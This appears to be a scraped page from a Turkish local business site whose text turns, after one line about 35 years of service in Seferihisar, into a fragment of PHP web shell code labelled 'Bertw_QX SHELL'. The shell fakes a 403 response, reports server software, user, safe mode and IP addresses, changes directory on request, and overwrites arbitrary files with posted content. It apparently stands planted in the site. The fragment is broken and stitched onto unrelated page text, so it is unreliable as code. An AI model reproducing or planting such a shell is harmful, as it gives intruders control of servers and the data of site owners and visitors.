SEFERİHİSARDA 35 YILDIR HİZMET VERMEKTEYİZ.
ON'):('OFF');$cwd=getcwd();$bckC='#000';$txtC='#00ff00'; $start='403
'; $end='';$inf='
[ ! ] ./Bertw_QX SHELL [ ! ]
SOFTWARE : '.$server_soft.'
UNAME : '.$uname.'
USER : '.$cur_user.'
SAFE MODE : '.$safe_mode.'
DIRECTORY : '.$cwd.'
'; print $start;print $menu;print $inf; $moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print ''; foreach($moreI as $n => $v) {print '';} print '
'.$n.' | :> | '.$v.' |
PHPInfo |
'; if(isset($_GET['d'])) {chdir($_GET['d']);} if(isset($_REQUEST['x'])) { switch($_REQUEST['x']) { case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '
Error Opening File
';fwrite($e,$_POST['edit_form']) or print '
Couldn\'t Save File
';fclose($e);}print '
Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .